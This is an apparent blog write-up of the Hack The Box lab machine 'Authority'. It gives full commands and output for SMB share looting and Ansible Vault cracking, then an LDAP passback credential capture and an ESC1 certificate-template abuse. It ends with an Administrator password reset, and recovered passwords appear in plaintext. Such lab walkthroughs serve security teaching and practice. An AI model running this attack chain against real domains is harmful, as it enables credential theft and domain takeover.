This is my very first HTB write-up, so we'll see how it goes. Please leave a comment if there are any comments or suggestions.
I really liked this box. I thought it was fun and I learned a few things along the way. I pwned this machine last July but couldn't post this because it was still active and then forgot about it. LoL
Recon
nmap
nmap shows we are dealing with a Windows system that appears to be a Domain Controller. Based on the name of the box, I'm betting it's also a Certificate Authority as well. 😉
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ nmap -T4 -p- -A 10.129.145.117 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-30 17:06 CDT
Warning: 10.129.145.117 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.145.117
Host is up (0.053s latency).
Not shown: 65497 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-31 02:17:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::[email protected], DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2023-07-31T02:18:57+00:00; +4h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6934/tcp filtered unknown
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-07-29T01:14:56
|_Not valid after: 2025-07-30T12:53:20
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Mon, 31 Jul 2023 02:18:04 GMT
| Connection: close
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Mon, 31 Jul 2023 02:18:04 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Mon, 31 Jul 2023 02:18:10 GMT
| Connection: close
9389/tcp open mc-nmf .NET Message Framing
11702/tcp filtered unknown
12076/tcp filtered unknown
13747/tcp filtered unknown
17718/tcp filtered unknown
28638/tcp filtered unknown
34771/tcp filtered unknown
35404/tcp filtered unknown
36253/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
50919/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-07-31T02:18:51
|_ start_date: N/A
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 3h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 746.91 seconds
IIS
I take a quick peek at IIS, but it's just the default start page. I make note that I may need to use gobuster later.SMB
Enumeration
smbmap doesn't give me much at first, but with a bad username, I get a guest session.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ smbmap -H 10.129.145.117
[+] IP: 10.129.145.117:445 Name: authority
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ smbmap -H 10.129.145.117 -u 'N1nja'
[+] Guest session IP: 10.129.145.117:445 Name: authority
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares NO ACCESS
Development READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
I download the contents of the Development share with smbclient.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ smbclient '\\10.129.145.117\Development' -N -c 'prompt OFF; recurse ON; mget *'
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Automation/Ansible/ADCS/.ansible-lint (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\.yamllint of size 205 as Automation/Ansible/ADCS/.yamllint (0.9 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\LICENSE of size 11364 as Automation/Ansible/ADCS/LICENSE (52.1 KiloBytes/sec) (average 18.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\README.md of size 7279 as Automation/Ansible/ADCS/README.md (33.7 KiloBytes/sec) (average 22.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.txt of size 466 as Automation/Ansible/ADCS/requirements.txt (2.2 KiloBytes/sec) (average 18.1 KiloBytes/sec)
...snip Ansible Vault
I found a couple of usernames and passwords, but none of them turned out to be helpful. I did find some interesting data encrypted with Ansible Vault though.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat Automation/Ansible/PWM/defaults/main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764 I've never really used Ansible, so I didn't know much about Ansible Vault and had to do some searching.
I put each of those vault strings into their own file.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat pwm_admin.vault
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat pwm_pass.vault
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat ldap.vault
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible2john pwm_admin.vault > pwm_admin.hash
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ cat pwm_admin.hash
pwm_admin.vault:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ john pwm_admin.hash
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
!@#$%^&* (pwm_admin.vault)
1g 0:00:00:29 DONE 2/3 (2023-07-30 18:09) 0.03334g/s 868.5p/s 868.5c/s 868.5C/s !@#$%..Gretel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
This is where my "skimming" hurt me. I did the above for all 3 files and got "!@#$%^&*" back for each of them. I thought something was wrong and went back to enumerating the rest of the files a while. Once I didn't find anything useful, I came back to this and upon reading fully, I learned that john was just cracking the vault password, not the vault string itself.
Having that additional bit of knowledge, I used ansible-vault to view the encrypted data.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible-vault view pwm_admin.vault
Vault password:
svc_pwm
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible-vault view pwm_pass.vault
Vault password:
pWm_@dm!N_!23
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ ansible-vault view ldap.vault
Vault password:
DevT3st@123
Only one of these actually turned out to be useful.
PWM
When browsing to https://10.129.145.117:8443, I get a certificate warning as expected. I accept the risk and continue. I also make note that I may need to add the cert to my local trust store.
I'm then brought to a Password Self-Service site and given a notice that it's in configuration mode.
I'm also greeted with a logon page.
I used the pwm_admin_password from the ansible vault and I'm in. I search around the configuration a bit and I see an LDAP URL and an LDAP Proxy User setting. Unfortunately, it doesn't show us the LDAP Proxy Password value.
Shell as svc_ldap
Passback Attack
I add a new LDAP URL with my attacker IP address, fire up a netcat listener, and test the LDAP profile.
Viola! We have a password for the svc_ldap account.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ nc -lvp 389
listening on [any] 389 ...
10.129.145.117: inverse host lookup failed: Unknown host
connect to [10.10.14.83] from (UNKNOWN) [10.129.145.117] 60247
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb�lDaP_1n_th3_cle4r!0PWinRM Shell
Unsure if that user can, but I always try to get a WinRM Shell when I get new creds. It works and we get the user flag.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ evil-winrm -i 10.129.145.117 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cat ..\Desktop\user.txt
e8dd...snipPrivilege Escalation
whoami shows us which privileges our user has.
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWe have the SeMachineAccountPrivilege. This is important and I overlooked this when doing the box. It will come into play later.
As anticipated, this box is also a Certificate Authority. I had to do some research on CA vulnerabilities because while I know "about" them, I've never actually exploited one. AD CS Domain Escalation - HackTricks is a pretty good reference.
We use certipy-ad to see if there are any vulnerable Certificate Templates.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad find -dc-ip 10.129.145.117 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollmentCheckUserDsCertificate
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationWe see that the CorpVPN template is vulnerable to ESC1, but my user doesn't have Enrollment Rights. This is where I fell into a rabbit hole because of overlooking the SeMachineAccountPrivilege. I spent an hour or two continuing to enumerate and dive deeper into the rabbit hole until I took a break. Not 5 minutes after I stepped away, it hit me right in the face and I felt like such a fool. Domain Computers has enrollment rights, and I have a privilege that lets me create domain computers. I ran back to my office.
We use impacket-addcomputer to create a new computer object.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ impacket-addcomputer -computer-name 'N1NJA$' -computer-pass 'N1njaPass!' -dc-host 10.129.145.117 authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Successfully added machine account N1NJA$ with password N1njaPass!.
We can then use certipy-ad again to request a certificate using our newly created computer object.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad req -u 'N1NJA$' -p 'N1njaPass!' -ca AUTHORITY-CA -dc-ip 10.129.145.117 -template CorpVPN -upn [email protected]
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
And now we have a certificate with a subjectAltName of [email protected]. Unfortunately, we can't authenticate with that certificate because the Domain Controller doesn't seem to support PKINIT.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.145.117
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)We get similar results when trying to use rubeus like most of the guides I've found show. It's back to Google I go to find a way to try to use this certificate. That's when I find PassTheCert from AlmondOffSec. With this, I should be able to connect to LDAP using the certificate. Let's give it a try.
First, I need to break out the pfx to a crt and key.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad cert -pfx administrator.pfx -nokey -out admin.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'admin.crt'
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad cert -pfx administrator.pfx -nocert -out admin.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'admin.key'Now, I can try to connect to LDAP. I opt to just get an ldap-shell.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ python3 passthecert.py -action ldap-shell -crt admin.crt -key admin.key -domain authority.htb -dc-ip 10.129.145.117
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Type help for list of commands
#
We have an ldap-shell! Looking at the built-in help for the ldap shell, the easiest way forward here is to just change the password of the Administrator account.
# change_password Administrator N1njaPass!
Got User DN: CN=Administrator,CN=Users,DC=authority,DC=htb
Attempting to set new password of: N1njaPass!
Password changed successfully!Now with the password set, all that's left is connect via WinRM and grab the flag.
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ evil-winrm -i 10.129.145.117 -u 'administrator' -p 'N1njaPass!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
8c0e...snip
No comments:
Post a Comment